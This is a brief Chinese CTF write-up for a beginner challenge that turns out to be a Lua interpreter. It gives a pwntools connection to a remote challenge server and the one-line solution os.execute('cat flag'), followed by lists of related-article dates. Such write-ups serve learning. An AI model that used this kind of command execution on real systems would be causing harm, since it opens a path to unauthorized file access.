LUA

萌新入坑(2)
根本就不是一个可执行程序,查一下居然是lua语言,写个exp执行一下,了解一下lua语言

from pwn import *
p = remote("111.198.29.45",32577) 

p.interactive()

萌新入坑(2)

直接用
os.execute("cat flag")

可以了

相关文章:

  • 2021-12-01
  • 2022-01-08
  • 2022-12-23
  • 2022-12-23
  • 2021-12-21
  • 2022-01-08
  • 2021-12-16
  • 2021-10-19
猜你喜欢
  • 2021-08-01
  • 2021-10-11
  • 2021-04-10
  • 2021-06-25
  • 2021-06-04
  • 2021-05-04
  • 2021-06-17
相关资源
相似解决方案